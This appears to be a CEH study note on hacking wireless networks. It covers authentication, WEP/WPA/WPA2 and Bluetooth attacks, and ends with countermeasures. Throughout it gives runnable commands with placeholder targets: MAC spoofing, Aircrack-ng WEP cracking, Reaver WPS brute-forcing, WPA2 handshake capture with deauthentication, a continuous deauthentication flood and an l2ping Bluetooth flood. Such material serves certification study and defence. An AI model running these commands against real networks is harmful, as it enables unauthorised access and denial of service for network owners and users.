This authentication type provides the highest level of security for your wireless network. By using the Extensible Authentication Protocol (EAP) to interact with an EAP-compatible RADIUS server, the access point helps a wireless client device and the RADIUS server to perform mutual authentication and derive a dynamic unicast WEP key. The RADIUS server sends the WEP key to the access point, which uses the key for all unicast data signals that the server sends to or receives from the client. The access point also encrypts its broadcast WEP key (which is entered in the access point’s WEP key slot 1) with the client’s unicast key and sends it to the client.

MAC Address Authentication to the Network

The access point relays the wireless client device’s MAC address to a RADIUS server on your network, and the server checks the address against a list of allowed MAC addresses. Because intruders can create counterfeit MAC addresses, MAC-based authentication is less secure than EAP authentication. However, MAC-based authentication provides an alternative authentication method for client devices that do not have EAP capability.
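
As a side note on why MAC-based authentication is weak, changing the MAC address of a wireless interface is trivial on most systems. A minimal sketch on a Linux machine, assuming an interface called ‘wlan0’ and the ‘ip’ and ‘macchanger’ tools, could be:

# Bring the interface down before changing its hardware address
sudo ip link set dev wlan0 down

# Option 1: set a specific (spoofed) MAC address
sudo ip link set dev wlan0 address 00:11:22:33:44:55

# Option 2: let macchanger pick a random address
sudo macchanger -r wlan0

# Bring the interface back up
sudo ip link set dev wlan0 up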

Combining MAC-Based, EAP, and Open Authentication

You can set up the access point to authenticate client devices that use a combination of MAC-based and EAP authentication. When you enable this feature, client devices that use 802.11 open authentication to associate with the access point first attempt MAC authentication. If MAC authentication succeeds, the client device joins the network. If MAC authentication fails, EAP authentication takes place.

Using WPA Key Management

Wi-Fi Protected Access (WPA) is a standards-based, interoperable security enhancement that strongly increases the level of data protection and access control for existing and future wireless LAN systems. It is derived from, and is forward-compatible with, the IEEE 802.11i standard. WPA leverages TKIP (Temporal Key Integrity Protocol) for data protection and 802.1X for authenticated key management.

WPA key management supports two mutually exclusive management types: WPA and WPA-Pre-shared key (WPA-PSK). Using WPA key management, clients and the authentication server authenticate to each other using an EAP authentication method, and the client and server generate a pairwise master key (PMK). Using WPA, the server generates the PMK dynamically and passes it to the access point. Using WPA-PSK, however, you configure a pre-shared key on both the client and the access point, and that pre-shared key is used as the PMK.
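
To make the WPA-PSK case more concrete, the 256-bit pre-shared key (used as the PMK) is derived from the passphrase and the SSID. On Linux, the ‘wpa_passphrase’ utility that ships with wpa_supplicant shows this derivation; the SSID and passphrase below are just placeholders:

# Derive the 256-bit pre-shared key from a passphrase and an SSID
# (both values are examples)
wpa_passphrase MyNetwork 'MySecretPassphrase'

# The output is a wpa_supplicant network block containing the
# hexadecimal 'psk' value derived via PBKDF2, roughly:
# network={
#     ssid="MyNetwork"
#     #psk="MySecretPassphrase"
#     psk=<64 hexadecimal characters>
# }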

Wi-Fi Chalking

Wi-Fi Chalking groups several methods used to detect and advertise open wireless networks; some of them are:

  • WarWalking: Walking around to detect open networks.
  • WarChalking: Using symbols and signs to advertise open wireless networks.
  • WarFlying: Detection of open wireless networks using drones.
  • WarDriving: Driving around to detect open wireless networks.

Types of Wireless Antennas

  • Directional Antenna: Directional antennas, as the name implies, focus the wireless signal in a specific direction resulting in a limited coverage area. An analogy for the radiation pattern would be how a vehicle headlight illuminates the road. Types of Directional antennas include Yagi, Parabolic grid, patch and panel antennas.
  • Omni-Directional: Omni-directional antennas provide a 360º doughnut-shaped radiation pattern to provide the widest possible signal coverage in indoor and outdoor wireless applications. An analogy for the radiation pattern would be how an un-shaded incandescent light bulb illuminates a room. Types of Omni-directional antennas include “rubber duck” antennas often found on access points and routers, Omni antennas found outdoors, and antenna arrays used on cellular towers.
  • Parabolic Antenna: A parabolic antenna is an antenna that uses a parabolic reflector, a curved surface with the cross-sectional shape of a parabola, to direct the radio waves. The most common form is shaped like a dish and is popularly called a dish antenna or parabolic dish.
  • Yagi Antenna: A Yagi–Uda antenna, commonly known as a Yagi antenna, is a directional antenna consisting of multiple parallel elements in a line, usually half-wave dipoles made of metal rods.
  • Dipole Antenna: A dipole antenna or doublet is the simplest and most widely used class of antenna. The dipole is any one of a class of antennas producing a radiation pattern approximating that of an elementary electric dipole with a radiating structure supporting a line current so energized that the current has only one node at each end.

Wireless Encryption

WEP

Wired Equivalent Privacy (WEP) was introduced as part of the original 802.11 standard ratified in 1997 and was, for a long time, the most widely used Wi-Fi security protocol. It is easily recognisable by its keys of 10 or 26 hexadecimal digits (40 or 104 bits). In 2004, both WEP-40 and WEP-104 were declared deprecated. There were also 128-bit and 256-bit WEP variants, but ever-increasing computing power enabled attackers to exploit its numerous security flaws. All in all, this protocol is “dead”.

Breaking this encryption can be performed by following these steps (a command-level sketch using the Aircrack-ng suite is shown after the list):

  • Monitor the access point channel.
  • Test injection capability of the access point.
  • Use a tool for fake authentication.
  • Sniff the packets in the network.
  • Use an injection tool to replay packets and generate traffic.
  • Use a cracking tool to extract the encryption key from the captured initialisation vectors (IVs).
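
Mapping those steps to actual commands, a hedged sketch using the Aircrack-ng suite could look like the following; the interface name, channel, SSID, BSSID and client MAC address are placeholders:

# Put the wireless card into monitor mode (creates e.g. wlan0mon)
sudo airmon-ng start wlan0

# Monitor the access point channel and write the captured IVs to disk
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w wep_capture wlan0mon

# Test the injection capability of the card against the access point
sudo aireplay-ng -9 -e TargetSSID -a AA:BB:CC:DD:EE:FF wlan0mon

# Fake authentication with the access point
sudo aireplay-ng -1 0 -e TargetSSID -a AA:BB:CC:DD:EE:FF -h 00:11:22:33:44:55 wlan0mon

# Inject ARP request packets to generate traffic (and, with it, IVs)
sudo aireplay-ng -3 -b AA:BB:CC:DD:EE:FF -h 00:11:22:33:44:55 wlan0mon

# Extract the WEP key from the captured initialisation vectors
sudo aircrack-ng wep_capture-01.cap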

WPA

Wi-Fi Protected Access (WPA) became available in 2003 and was the Wi-Fi Alliance’s direct response and replacement for the increasingly apparent vulnerabilities of the WEP encryption standard. The most common WPA configuration is WPA-PSK (Pre-Shared Key). The keys used by WPA are 256-bit, a significant increase over the 64-bit and 128-bit keys used in the WEP system.

WPA included message integrity checks (to determine if an attacker had captured/altered packets passed between the access point and client) and the Temporal Key Integrity Protocol (TKIP). TKIP employs a per-packet key system that was radically more secure than the fixed key system used by WEP. The TKIP encryption standard was later superseded by Advanced Encryption Standard (AES).

TKIP uses the same underlying mechanism as WEP and consequently is vulnerable to a number of similar attacks (e.g. Chop-Chop, MIC Key Recovery attack).

Usually, attackers do not target the WPA protocol directly, but a supplementary system that was rolled out with WPA: Wi-Fi Protected Setup (WPS).
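
As a hedged illustration of this, tools like Wash and Reaver can be used to locate WPS-enabled access points and to brute-force the WPS PIN; the interface and BSSID below are placeholders:

# List nearby access points with WPS enabled (monitor mode assumed)
sudo wash -i wlan0mon

# Try to brute-force the WPS PIN of a target access point; if it
# succeeds, Reaver also recovers the WPA/WPA2 passphrase
sudo reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -vv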

WPA2

WPA2 replaced WPA. Certification began in September 2004 and, from March 13, 2006, WPA2 certification was mandatory for all new devices bearing the Wi-Fi trademark. The most important upgrade is the mandatory use of AES (instead of the previous RC4) and the introduction of CCMP (AES-CCMP, Counter Mode with Cipher Block Chaining Message Authentication Code Protocol, 128-bit) as a replacement for TKIP (which is still present in WPA2 as a fallback system and for WPA interoperability).
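
Even with WPA2, the pre-shared key can be attacked offline if the 4-way handshake is captured and the passphrase is weak. A minimal sketch with the Aircrack-ng suite, again with a placeholder channel, BSSID, client MAC and wordlist:

# Capture traffic for the target access point, waiting for a 4-way handshake
sudo airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w wpa_capture wlan0mon

# Optionally, deauthenticate a connected client so it re-associates
# and produces a new handshake
sudo aireplay-ng -0 5 -a AA:BB:CC:DD:EE:FF -c 11:22:33:44:55:66 wlan0mon

# Run a dictionary attack against the captured handshake
sudo aircrack-ng -w wordlist.txt -b AA:BB:CC:DD:EE:FF wpa_capture-01.cap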

Wireless Threats

  • Access control attacks: Attackers gain access to a network they are not authorised to use.
  • Integrity and confidentiality attacks: Attackers intercept confidential information going through the network.
  • Availability attacks: Attackers prevent legitimate users from accessing the network (see the deauthentication sketch after this list).
  • Authentication attacks: Attackers try to impersonate legitimate users of the network.
  • Rogue access point attacks: By starting a rogue access point with the same SSID as an existing, legitimate one in the same location, attackers try to gain access to the network and its traffic.
  • Client mis-association: Placing a rogue access point outside the areas covered by the legitimate ones to take advantage of the auto-connect settings of user devices and capture the traffic they generate.
  • Misconfigured access point attacks: Attackers gain access to existing access points by taking advantage of misconfigurations on the device.
  • Unauthorised association: By taking advantage of a user’s trojanised computer, attackers can get themselves connected to private networks.
  • Ad-hoc connection attacks: Ad-hoc connections tend to be insecure because they do not provide strong authentication and encryption, making it possible for attackers to take advantage of them.
  • Jamming signal attacks: By simply emitting an interference signal, an attacker can effectively block communication on a wireless channel, disrupt normal operation, cause performance issues and even damage control systems.
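
As an example of the availability attacks mentioned above, a continuous broadcast deauthentication flood can be generated with Aireplay-ng; the BSSID is a placeholder and a monitor-mode interface is assumed:

# Send deauthentication frames to all clients of the access point
# indefinitely (0 means keep sending), effectively a wireless DoS
sudo aireplay-ng -0 0 -a AA:BB:CC:DD:EE:FF wlan0mon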

Wireless Attack Methodology

  • Wi-Fi discovery: Collect information by active footprinting.
  • GPS mapping: Creation of a list of existing access points and their locations.
  • Wireless traffic analysis: Capturing packets to reveal information about the access point and the network (see the sketch after this list).
  • Launch wireless attacks: Using a tool like Aircrack-ng to run one or more of the possible attacks against a wireless network.
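
For the discovery and traffic analysis steps, a hedged sketch with the Aircrack-ng suite, assuming the card is already in monitor mode as ‘wlan0mon’, could be:

# Discover nearby access points and clients: BSSID, channel,
# encryption in use and associated stations
sudo airodump-ng wlan0mon

# Write everything to disk for later analysis (capture and CSV files)
sudo airodump-ng --write discovery --output-format pcap,csv wlan0mon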

Bluetooth Hacking

Bluetooth is a wireless technology which is found in pretty much every phone you can get your hands on. But it is also in many other devices and gadgets around the home and the office, such as laptops, speakers, headphones and more. Bluetooth is used to connect devices that are in close proximity, cutting down on cables and giving you flexibility and freedom. Bluetooth is designed to allow devices to communicate wirelessly with each other over relatively short distances. It typically works over a range of fewer than 100 meters. The range has been intentionally limited in order to keep its power drain to a minimum. Bluetooth operates in the 2.4 GHz frequency band.

Bluetooth has a discovery feature that enables devices to be discoverable by other Bluetooth devices.
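
On a Linux machine with the BlueZ stack, nearby discoverable devices can be listed with something like the following, assuming the default ‘hci0’ adapter:

# Make sure the local Bluetooth adapter is up
sudo hciconfig hci0 up

# Scan for discoverable Bluetooth devices in range
hcitool scan

# Run an inquiry that also shows clock offset and device class
hcitool inq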

Bluetooth Attacks

  • BlueSmacking: Basically, a DoS attack against a Bluetooth device, flooding it with packets, for example, oversized echo requests (see the sketch after this list).
  • BlueBugging: In this type of attack, attackers exploit devices to gain access and compromise their security.
  • BlueJacking: The act of sending unsolicited messages to Bluetooth-enabled devices.
  • BluePrinting: A method or technique to extract information and details about a remote device, such as its firmware, manufacturer, model, etc.
  • BlueSnarfing: Exploiting security vulnerabilities, attackers steal the information stored on Bluetooth devices.
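
As a hedged sketch of the first and fourth items of the list, BlueZ ships tools that can flood a device with echo requests (BlueSmacking) and enumerate its services (BluePrinting); the Bluetooth address below is a placeholder:

# BlueSmacking: flood the target with oversized L2CAP echo requests
# (-s sets the packet size, -f enables flood mode)
sudo l2ping -s 600 -f AA:BB:CC:DD:EE:FF

# BluePrinting: browse the SDP records of the target to learn which
# services, profiles and channels it exposes
sdptool browse AA:BB:CC:DD:EE:FF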

Bluetooth Countermeasures

  • Keep checking the paired devices list.
  • Keep devices in non-discoverable mode (see the example after this list).
  • Use strong, non-regular PIN patterns when pairing devices.
  • Use encryption.
  • Install host-based security.
  • Do not accept unknown or suspicious pairing requests.
  • When idle, keep your Bluetooth disabled.
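
For instance, on Linux with BlueZ, a device can be kept in non-discoverable mode (second item of the list) with either of the following, assuming the default ‘hci0’ adapter:

# Using bluetoothctl (run it interactively or, in recent BlueZ
# versions, pass the command directly)
bluetoothctl discoverable off

# Or with the older hciconfig tool: enable page scan only, so the
# adapter stays connectable for paired devices but does not answer
# discovery requests
sudo hciconfig hci0 pscan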

Wireless Security Tools

Wireless Intrusion Prevention Systems

A wireless intrusion prevention system (WIPS) operates at Layer 2 (the data link layer) of the Open Systems Interconnection model. A WIPS can detect the presence of rogue or misconfigured devices and can prevent them from operating on wireless enterprise networks by scanning the network’s radio frequencies for denial of service and other forms of attack.

A wireless intrusion detection system (WIDS) monitors the radio spectrum for the presence of unauthorised, rogue access points and the use of wireless attack tools. The system monitors the radio spectrum used by wireless LANs and immediately alerts a systems administrator whenever a rogue access point is detected. Conventionally, this is achieved by comparing the MAC addresses of the participating wireless devices.

Wi-Fi Security Auditing Tools

There are several tools defenders can use to audit, troubleshoot, detect and prevent intrusions, mitigate threats, detect rogue access points, protect against zero-day threats, investigate incidents (forensics) and create compliance reports, helping to protect wireless networks. Tools like:

  • AirMagnet Wi-Fi Analyser
  • Motorola’s AirDefense Services Platform (ADSP)
  • Cisco Adaptive Wireless IPS
  • Aruba RFProtect

In addition, SANS has a whitepaper with the title Wireless Network Audits using Open Source tools.

Countermeasures

Multiple techniques and practices can be adopted to prevent attacks on wireless networks, some of them already discussed previously, such as using monitoring and auditing tools, configuring strict access control policies, following best practices and using appropriate encryption like WPA2 together with strong authentication. Some of these basic techniques are:

  • Access point scanning
  • Change default parameters
  • Disable remote login for wireless devices
  • Wireless IPS deployment
  • Configuring WPA2 with AES for data protection (a configuration sketch follows this list)
  • Choose strong passwords
  • RF scanning
  • MAC filtering
  • Disable SSID broadcast
  • Update software and patches
  • Blocking rogue access points
  • Per-packet authentication
  • Strong authentication
  • Enable firewall protection
  • Network management software
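
As a hedged configuration sketch covering a few of those points (WPA2 with AES/CCMP for data protection, a hidden SSID and MAC filtering), a minimal hostapd configuration for a Linux-based access point could look like this; the interface, SSID, passphrase and file paths are placeholders:

# Write a minimal hostapd configuration (all values are examples)
cat <<'EOF' | sudo tee /etc/hostapd/hostapd.conf
interface=wlan0
ssid=HomeNetwork
hw_mode=g
channel=6
# WPA2 only, pre-shared key mode, AES/CCMP for data protection
wpa=2
wpa_key_mgmt=WPA-PSK
rsn_pairwise=CCMP
wpa_passphrase=A-long-and-strong-passphrase
# Do not broadcast the SSID
ignore_broadcast_ssid=1
# Only accept clients whose MAC address is listed in the file below
macaddr_acl=1
accept_mac_file=/etc/hostapd/hostapd.accept
EOF
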
CEH (XVII): Hacking Wireless Networks